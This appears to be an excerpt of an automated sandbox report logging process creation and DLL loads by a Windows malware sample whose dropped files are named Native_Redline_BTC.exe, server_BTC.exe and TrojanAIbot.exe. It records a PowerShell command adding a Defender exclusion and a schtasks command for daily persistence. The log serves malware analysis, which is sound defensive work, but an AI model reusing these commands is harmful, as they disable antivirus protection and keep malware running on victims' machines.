                        Source: unknown Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                        Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                        Source: unknown Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                        Source: unknown Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                        Source: unknown Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                        Source: unknown Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                        Source: unknown Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
                        Source: unknown Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                        Source: unknown Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                        Source: unknown Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
                        Source: unknown Process created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
                        Source: unknown Process created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
                        Source: unknown Process created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
                        Source: unknown Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                        Source: unknown Process created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AENiBH7X1q.exe"
                        Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe"
                        Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpEAAD.tmp.cmd""
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Section loaded: wsock32.dll
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Section loaded: version.dll
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Section loaded: winmm.dll
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Section loaded: mpr.dll
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Section loaded: wininet.dll
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: appresolver.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: bcp47langs.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: slc.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sppc.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\SysWOW64\svchost.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: secur32.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: webio.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: vaultcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Section loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: mswsock.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: winhttp.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: mpr.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: secur32.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: ntmarta.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: winnsi.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\alg.exe Section loaded: webio.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: dwrite.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: msvcp140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: linkinfo.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntshrui.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: cscapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: edputil.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
